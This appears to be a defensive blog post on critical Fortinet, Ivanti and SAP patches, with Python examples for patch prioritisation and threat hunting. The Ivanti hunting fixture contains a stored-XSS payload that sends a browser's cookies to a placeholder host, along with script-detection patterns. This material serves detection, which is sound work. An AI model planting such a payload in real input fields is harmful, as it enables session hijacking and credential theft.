Urgent Patches: Fortinet, Ivanti, SAP—AI Helps First

AI in Cybersecurity · By 3L3C

Urgent Fortinet, Ivanti, and SAP patches highlight why AI-powered monitoring helps detect exploitation early and prioritize fixes before attackers move.

Tags: CVE, Patch management, Security operations, Threat detection, Fortinet, Ivanti, SAP


Urgent Patches for Fortinet, Ivanti, and SAP—and How AI Helps You Stay Ahead

A CVSS 9.8 or 9.9 isn’t just a “critical” label; it’s a countdown timer. This week’s patch alerts from Fortinet, Ivanti, and SAP follow a familiar pattern: authentication bypass paths, code execution routes, and “not enabled by default” footnotes that don’t help the organizations that enabled the feature months ago and forgot.

Here’s what most companies get wrong: they treat urgent patching as a calendar problem (“Can we fit this into the next change window?”) instead of an exposure problem (“Are we already being probed, and can we spot it fast?”). That’s where AI in cybersecurity earns its keep—not by replacing patching, but by shrinking the time between new exploit signal and your response.

This post breaks down what’s happening in the Fortinet, Ivanti, and SAP advisories, why these vulnerability classes keep recurring, and the practical ways AI-powered security monitoring can help you detect exploitation attempts, prioritize fixes, and reduce blast radius when patching can’t happen instantly.

What the new patches tell us (and why it matters)

These advisories share a simple message: identity and execution paths are still the fastest way to own an environment. The specifics differ, but the attacker outcomes are consistent—get in without valid authentication, then run code or hijack privileged sessions.

Fortinet: SAML signature verification mistakes become login bypasses

Fortinet addressed two critical issues, CVE-2025-59718 and CVE-2025-59719 (both CVSS 9.8), rooted in improper verification of a cryptographic signature (CWE-347). In plain terms: if FortiCloud SSO admin login is enabled, a crafted SAML message can let an unauthenticated attacker bypass FortiCloud SSO admin authentication.

Yes, the feature is not enabled by default. No, that isn’t comforting. In real networks, features get enabled during rollouts, troubleshooting, or “temporary” configurations that become permanent.

Immediate mitigation (before patching): disable FortiCloud SSO admin login if you don’t need it. This is exactly the kind of “reduce exposed surface now, patch next” move that saves weekends.

Ivanti Endpoint Manager: stored XSS that turns admin consoles into entry points

Ivanti shipped fixes for multiple Endpoint Manager (EPM) vulnerabilities, including CVE-2025-10573 (CVSS 9.6): a stored XSS issue allowing a remote unauthenticated attacker to execute JavaScript in the context of an admin session.

The interesting (and worrying) part is the exploitation path described by researchers: attackers can join fake managed endpoints to poison the admin dashboard with malicious JavaScript. The “user interaction required” detail doesn’t lower real risk—admins have to use the console to do their jobs.

Ivanti states it’s not aware of in-the-wild exploitation at the time of the advisory. That doesn’t mean you can wait; it means you have a short window to patch before opportunistic scanning and copycat exploitation ramp up.

SAP: critical code injection, Tomcat issues, and deserialization risk

SAP’s December security updates include 14 vulnerabilities, with three critical items worth calling out:

  • CVE-2025-42880 (CVSS 9.9): code injection in SAP Solution Manager
  • CVE-2025-55754 (CVSS 9.6): multiple vulnerabilities in Apache Tomcat within SAP Commerce Cloud
  • CVE-2025-42928 (CVSS 9.1): deserialization vulnerability in SAP jConnect SDK for Sybase ASE

SAP Solution Manager is central plumbing in many SAP landscapes. If attackers gain a foothold there, lateral movement and credential access become a lot easier. For many enterprises, SAP is “too important to change quickly,” which is exactly why attackers like it.

The common thread: verification failures and trust abuse

The surface details vary—SAML messages, device reports, Java deserialization—but the root cause is familiar: systems trusted something they shouldn’t.

  • Signature verification flaws (Fortinet, and one Ivanti patch-management component issue) often show up when implementations accept malformed tokens, skip validation steps, mishandle certificate chains, or verify a signature without checking that it actually covers the assertion being consumed.
  • Stored XSS (Ivanti) is a trust problem in UI pipelines: untrusted input becomes trusted script.
  • Deserialization and code injection (SAP) are trust problems in execution pipelines: untrusted input becomes executable logic.

A good security program assumes these mistakes will keep happening—because they will. The winning move is building operations that can:

  1. Detect early exploit signals (often before a vendor confirms “exploited in the wild”)
  2. Prioritize patching by active exposure, not by CVSS alone
  3. Contain quickly when patching is delayed

This is where AI can be legitimately useful.

Where AI actually helps: faster detection, smarter prioritization

AI doesn’t magically “prevent CVEs.” What it can do is reduce your mean time to know and mean time to respond—especially when your environment includes firewalls, endpoint managers, and business-critical SAP systems.

1) AI-powered anomaly detection around authentication paths

For flaws like the Fortinet SSO bypass, you’re watching for abnormal authentication sequences and SAML behavior.

AI-driven detection can help by:

  • Modeling normal admin login patterns (source IPs, times, geographies, device fingerprints)
  • Flagging unusual SSO token use (sudden spikes, odd IdP metadata, new assertion structures)
  • Correlating failed logins + configuration changes + new admin sessions into one incident narrative

A practical stance I’ve found effective: treat your identity plane like production payment traffic. If something “rare” happens (new admin login from a new ASN at 3:12 a.m.), you don’t wait for certainty—you triage immediately.

2) AI to prioritize patches by reachable exposure

Most patch queues fail because they’re ordered by severity, not by exploitability in your environment.

AI-assisted vulnerability management can score urgency using signals like:

  • Is the vulnerable feature enabled (e.g., FortiCloud SSO admin login)?
  • Is the asset internet-facing or reachable from untrusted networks?
  • Are there active probes in your logs matching known exploit patterns?
  • Does the system sit on a high-trust junction (EPM core, SAP Solution Manager)?

A simple rule that beats many “criticality” spreadsheets:

Patch what attackers can reach first, not what auditors can read first.
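Here is that rule written out as a scoring function. This is an added example, not a vendor’s scoring model and not code from the original post; the inventory is constructed and the weights are illustrative. It shows the same CVSS 9.8 Fortinet finding landing both first and last in one queue depending on whether the SSO feature is enabled, the box is internet-facing, and probes are already hitting it, while a CVSS 9.1 item ranks above the disabled 9.8.

```python
"""Exposure-first patch prioritisation.

Added example, not a vendor tool's scoring or the article's own. The inventory
below is constructed, and the weights are an illustration of the rule
"patch what attackers can reach first", not a calibrated model.
"""

# Constructed findings: the same CVE can land in very different places in the
# queue depending on how the asset is actually deployed.
FINDINGS = [
    {"asset": "fw-edge-01", "cve": "CVE-2025-59718", "cvss": 9.8,
     "vuln_path_enabled": False, "internet_facing": True, "probes_seen": 0, "trust_junction": False},
    {"asset": "fw-dc-02", "cve": "CVE-2025-59718", "cvss": 9.8,
     "vuln_path_enabled": True, "internet_facing": True, "probes_seen": 12, "trust_junction": False},
    {"asset": "epm-core", "cve": "CVE-2025-10573", "cvss": 9.6,
     "vuln_path_enabled": True, "internet_facing": False, "probes_seen": 0, "trust_junction": True},
    {"asset": "solman-prd", "cve": "CVE-2025-42880", "cvss": 9.9,
     "vuln_path_enabled": True, "internet_facing": False, "probes_seen": 0, "trust_junction": True},
    {"asset": "jconn-dev", "cve": "CVE-2025-42928", "cvss": 9.1,
     "vuln_path_enabled": True, "internet_facing": False, "probes_seen": 0, "trust_junction": False},
]

# Illustrative weights (assumption): active probing and internet reachability
# outweigh a few tenths of CVSS; a high-trust junction bumps an item above peers.
W_INTERNET, W_PROBED, W_JUNCTION = 3.0, 4.0, 2.0


def exposure_score(f):
    """CVSS plus reachability signals; 0 when the vulnerable path is not enabled."""
    if not f["vuln_path_enabled"]:
        return 0.0
    score = f["cvss"]
    if f["internet_facing"]:
        score += W_INTERNET
    if f["probes_seen"] > 0:
        score += W_PROBED
    if f["trust_junction"]:
        score += W_JUNCTION
    return score


def action_for(f):
    """Translate the score drivers into the change-management lane to use."""
    if not f["vuln_path_enabled"]:
        return "verify config stays disabled; patch on normal cadence"
    if f["probes_seen"] > 0 or f["internet_facing"]:
        return "emergency change now"
    if f["trust_junction"]:
        return "first in next change window; add hunt rules meanwhile"
    return "standard patch cycle"


def prioritize(findings):
    """Patch queue ordered by reachable exposure, with CVSS only as a tie-breaker."""
    ordered = sorted(findings, key=lambda f: (-exposure_score(f), -f["cvss"], f["asset"]))
    return [{"asset": f["asset"], "cve": f["cve"], "cvss": f["cvss"],
             "score": round(exposure_score(f), 1), "action": action_for(f)} for f in ordered]


if __name__ == "__main__":
    for i, row in enumerate(prioritize(FINDINGS), 1):
        print(f"{i}. {row['asset']:<11} {row['cve']}  cvss={row['cvss']}  "
              f"exposure={row['score']:<5} {row['action']}")
```

The point of the zero score for a disabled feature is not that the box is safe, but that the first action there is a configuration check, not an emergency change; the moment the check finds SSO enabled, the item jumps to the top of the queue.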

3) AI-driven triage that cuts alert noise during patch weekends

December is peak “skeleton crew” season in many orgs. When a critical advisory hits on a Friday, you need an operations model that works with fewer people.

Security copilots and AI triage workflows can help by:

  • Summarizing raw events into one incident storyline
  • Suggesting likely affected systems based on CMDB + telemetry
  • Drafting containment steps (block rules, isolation actions, identity revocations)

The point isn’t automation for its own sake. It’s keeping humans focused on decisions that matter: isolate, patch, rotate credentials, verify integrity.

Practical playbooks for Fortinet, Ivanti, and SAP environments

Here’s how I’d run this in an enterprise SOC that wants speed without chaos.

Fortinet playbook: reduce SSO exposure, then hunt

Do now (hours):

  • Confirm whether FortiCloud SSO admin login is enabled anywhere.
  • Disable it temporarily where not required.
  • Restrict admin interfaces to management networks/VPN only.

AI-assisted hunting ideas (same day):

  • Look for new admin sessions preceded by unusual SSO assertions or atypical request sizes.
  • Baseline “normal” admin login sources; flag outliers.
  • Correlate admin login anomalies with config export, policy changes, and new local accounts.
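The baseline-and-outlier hunt described in the “AI-powered anomaly detection” section above and in the three hunting ideas just listed, as an added example: this is not Fortinet’s code and not code from the original post. The events and field names (ts, type, user, src_ip, asn, method, detail) are constructed assumptions about a normalised SIEM feed rather than a real FortiOS log format. The logic builds a per-admin baseline of source ASNs and login hours, flags logins that break it, and attaches any config-touching actions from the same source within the next 30 minutes, so the alert arrives as one storyline instead of three disconnected events.

```python
"""Admin-login baselining with follow-on correlation.

Added example, not Fortinet's code or the article's. Events are constructed;
the field names (ts, type, user, src_ip, asn, method, detail) are assumptions
about a normalised SIEM schema, not a real FortiOS log format.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Config-touching event types worth stitching onto a suspicious login.
SENSITIVE_FOLLOW_ONS = {"config_change", "config_export", "admin_create"}

# Constructed sample: a week of ordinary SSO admin logins, then a 03:12 login
# from a never-before-seen ASN that immediately adds an admin and exports config.
EVENTS = [
    {"ts": "2025-12-08T09:02:00", "type": "admin_login", "user": "netops", "src_ip": "203.0.113.10", "asn": "AS64500", "method": "sso"},
    {"ts": "2025-12-08T10:15:00", "type": "admin_login", "user": "netops", "src_ip": "203.0.113.11", "asn": "AS64500", "method": "sso"},
    {"ts": "2025-12-09T08:58:00", "type": "admin_login", "user": "netops", "src_ip": "203.0.113.10", "asn": "AS64500", "method": "sso"},
    {"ts": "2025-12-09T14:20:00", "type": "admin_login", "user": "secops", "src_ip": "203.0.113.20", "asn": "AS64500", "method": "sso"},
    {"ts": "2025-12-12T14:05:00", "type": "admin_login", "user": "secops", "src_ip": "203.0.113.20", "asn": "AS64500", "method": "sso"},
    {"ts": "2025-12-13T03:12:00", "type": "admin_login", "user": "netops", "src_ip": "198.51.100.77", "asn": "AS64496", "method": "sso"},
    {"ts": "2025-12-13T03:14:00", "type": "admin_create", "user": "netops", "src_ip": "198.51.100.77", "detail": "new admin svc_backup"},
    {"ts": "2025-12-13T03:16:00", "type": "config_export", "user": "netops", "src_ip": "198.51.100.77", "detail": "full backup download"},
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def build_baseline(events, cutoff):
    """Per-admin set of source ASNs and login hours seen before `cutoff` (ISO string)."""
    cut = datetime.fromisoformat(cutoff)
    asns, hours = defaultdict(set), defaultdict(set)
    for e in events:
        if e["type"] == "admin_login" and _ts(e) < cut:
            asns[e["user"]].add(e["asn"])
            hours[e["user"]].add(_ts(e).hour)
    return {"asns": asns, "hours": hours}


def login_anomalies(login, baseline):
    """Reasons this login deviates from the admin's own history (empty list = looks normal)."""
    user, reasons = login["user"], []
    if login["asn"] not in baseline["asns"].get(user, set()):
        reasons.append(f"new source ASN {login['asn']} for {user}")
    if _ts(login).hour not in baseline["hours"].get(user, set()):
        reasons.append(f"login hour {_ts(login).hour:02d} outside {user}'s usual hours")
    return reasons


def follow_on_actions(login, events, window=timedelta(minutes=30)):
    """Sensitive actions from the same source IP within `window` after the login."""
    start, end = _ts(login), _ts(login) + window
    return [e for e in events
            if e["type"] in SENSITIVE_FOLLOW_ONS
            and e["src_ip"] == login["src_ip"]
            and start <= _ts(e) <= end]


def hunt(events, cutoff):
    """Incident storylines: anomalous logins after `cutoff` plus what that source did next."""
    baseline = build_baseline(events, cutoff)
    cut = datetime.fromisoformat(cutoff)
    incidents = []
    for e in events:
        if e["type"] != "admin_login" or _ts(e) < cut:
            continue
        reasons = login_anomalies(e, baseline)
        if not reasons:
            continue
        actions = follow_on_actions(e, events)
        # An odd login that goes on to touch config is a triage-now event, not a "monitor" one.
        incidents.append({"login": e, "reasons": reasons, "follow_on": actions,
                          "severity": "high" if actions else "medium"})
    return incidents


if __name__ == "__main__":
    for inc in hunt(EVENTS, "2025-12-12"):
        print(f"[{inc['severity']}] {inc['login']['user']} from {inc['login']['src_ip']} at {inc['login']['ts']}")
        for r in inc["reasons"]:
            print("  -", r)
        for a in inc["follow_on"]:
            print("  then:", a["type"], a["detail"])
```

Run against the sample, the secops login on the 12th passes quietly (known ASN, usual hour) while the netops login on the 13th is reported once, with both reasons and the two follow-on actions attached. In production the baseline would come from weeks of history and the ASN lookup from your enrichment pipeline; the correlation window and the set of sensitive event types are the knobs to tune per platform.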

Ivanti EPM playbook: treat the console as a high-value target

Do now (hours):

  • Patch to EPM 2024 SU4 SR1 where possible.
  • If patching is delayed, restrict access to the EPM web service and admin console.

AI-assisted hunting ideas (same day):

  • Detect new “devices” registering at abnormal rates or from unusual subnets.
  • Alert on unexpected script-like patterns in fields that typically hold device metadata.
  • Monitor admin session behavior for signs of hijacking (sudden privilege actions, token reuse, abnormal user-agent changes).

Containment stance: assume that if an admin loads a poisoned dashboard, session takeover is the goal. Have a fast path to revoke sessions and rotate admin credentials.
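The first two hunting ideas above (enrolment rate from unusual subnets, and script-like content in fields that should hold device metadata) as an added example, not Ivanti’s code and not code from the original post. The enrolment events and their field names (ts, src_ip, device_name, os) are constructed assumptions about a device-inventory export rather than a real EPM schema, and the burst threshold is illustrative.

```python
"""Endpoint-manager enrolment hunting: registration bursts and script-shaped metadata.

Added example, not Ivanti's code or the article's. Enrolment events are
constructed; the field names (ts, src_ip, device_name, os) are assumptions
about a device-inventory export, not a real EPM schema.
"""
import ipaddress
import re
from collections import Counter
from datetime import datetime

# Markers of active content in fields that should only ever hold hostnames or OS strings.
SCRIPT_MARKERS = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|object|embed)\b"  # tags that execute or load
    r"|javascript\s*:"                                  # javascript: URLs
    r"|\bon[a-z]+\s*="                                  # inline handlers: onerror=, onload=
    r"|&lt;|&#x?[0-9a-f]+;",                            # entity-encoded variants
    re.IGNORECASE,
)

# Constructed baseline: a handful of ordinary enrolments from the corporate ranges.
BASELINE = [
    {"ts": "2025-12-10T09:10:00", "src_ip": "10.20.5.14", "device_name": "WKS-0412", "os": "Windows 11"},
    {"ts": "2025-12-10T11:40:00", "src_ip": "10.20.5.31", "device_name": "WKS-0419", "os": "Windows 11"},
    {"ts": "2025-12-11T08:55:00", "src_ip": "10.20.7.8", "device_name": "LT-FIN-07", "os": "Windows 10"},
    {"ts": "2025-12-11T15:02:00", "src_ip": "10.20.5.90", "device_name": "WKS-0420", "os": "Windows 11"},
]
# Constructed attack window: eight "devices" from an unfamiliar subnet inside one hour,
# two of them carrying payloads in fields the admin console renders.
BURST = [{"ts": f"2025-12-13T02:{m:02d}:00", "src_ip": f"192.0.2.{20 + i}",
          "device_name": f"WKS-90{i:02d}", "os": "Windows 11"}
         for i, m in enumerate(range(3, 27, 3))]
BURST[2]["device_name"] = '"><img src=x onerror=fetch("//198.51.100.5/?c="+document.cookie)>'
BURST[5]["os"] = "<svg onload=alert(1)>"
EVENTS = BASELINE + [
    {"ts": "2025-12-12T10:30:00", "src_ip": "10.20.5.77", "device_name": "WKS-0421", "os": "Windows 11"},
] + BURST


def _bucket(event):
    """(source /24, hour) key: enrolment rate only means something per network and time slice."""
    net = ipaddress.ip_network(event["src_ip"] + "/24", strict=False)
    return str(net), datetime.fromisoformat(event["ts"]).strftime("%Y-%m-%dT%H")


def registration_bursts(events, cutoff, floor=5, multiplier=3):
    """Buckets after `cutoff` exceeding `multiplier` x the busiest baseline bucket (never below `floor`)."""
    cut = datetime.fromisoformat(cutoff)
    before = Counter(_bucket(e) for e in events if datetime.fromisoformat(e["ts"]) < cut)
    after = Counter(_bucket(e) for e in events if datetime.fromisoformat(e["ts"]) >= cut)
    limit = max(floor, multiplier * max(before.values(), default=0))
    return [{"kind": "registration_burst", "subnet": subnet, "hour": hour, "count": n}
            for (subnet, hour), n in after.items() if n > limit]


def looks_like_script(value):
    """True when a metadata value contains something a browser would execute or load."""
    return bool(SCRIPT_MARKERS.search(value))


def poisoned_metadata(events):
    """Every enrolment whose device_name or os field is script-shaped."""
    return [{"kind": "script_in_metadata", "src_ip": e["src_ip"], "field": field, "value": e[field]}
            for e in events for field in ("device_name", "os") if looks_like_script(e[field])]


def hunt(events, cutoff):
    """Both signals in one list; either alone is reason to restrict the console and patch."""
    return registration_bursts(events, cutoff) + poisoned_metadata(events)


if __name__ == "__main__":
    for finding in hunt(EVENTS, "2025-12-12"):
        print(finding)
```

The two detections are deliberately independent: a patient attacker can register one fake endpoint a day and never trip the rate check, and a noisy scanner can enrol hundreds of devices with clean names. The metadata check also catches entity-encoded payloads, because what matters is what the console renders, not what the enrolment API received.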

SAP playbook: prioritize the central nodes

Do now (24–48 hours):

  • Identify whether SAP Solution Manager is present and how it’s segmented.
  • Apply SAP’s December patches with special urgency for the critical CVEs.
  • Validate that Java stacks embedding Tomcat are mapped and owned (this is where patching often stalls).

AI-assisted monitoring ideas:

  • Detect unusual authenticated activity against SAP Solution Manager function modules.
  • Flag anomalous remote execution indicators on SAP application hosts (new processes, unusual outbound connections).
  • Correlate SAP auth events with endpoint telemetry for “login + tool execution” patterns.

“People also ask” (quick, direct answers)

Does “not enabled by default” mean we’re safe?

No. Enterprise deployments rarely match factory defaults. You need configuration validation and continuous monitoring.

If a vulnerability requires user interaction (like an admin viewing a dashboard), is it lower risk?

Not in practice. If the interaction is part of normal operations, it’s highly likely to occur—especially for admins.

Can AI replace patching?

No. AI helps you detect, prioritize, and respond faster. The fix is still patching (or disabling the vulnerable feature).

What to do next: a tight 72-hour plan

If you want a concrete approach that fits real enterprise constraints, use this 72-hour plan:

  1. Inventory and exposure check (Day 1): confirm which Fortinet/Ivanti/SAP assets are deployed, internet-reachable, and feature-enabled.
  2. Temporary controls (Day 1–2): disable risky features, tighten admin access paths, add monitoring rules for exploit signals.
  3. Patch and verify (Day 2–3): patch in priority order by reachability and trust level; verify with post-patch validation and targeted hunts.

Urgent patches like these are exactly why the AI in Cybersecurity conversation matters. Not because AI makes vulnerabilities disappear, but because it shortens the gap between vendor disclosure and your containment. That gap is where breaches happen.

If you had to choose one place to invest before the next round of critical advisories: would you rather add another approval step to change management—or build AI-powered detection that tells you, with evidence, which system is being targeted right now?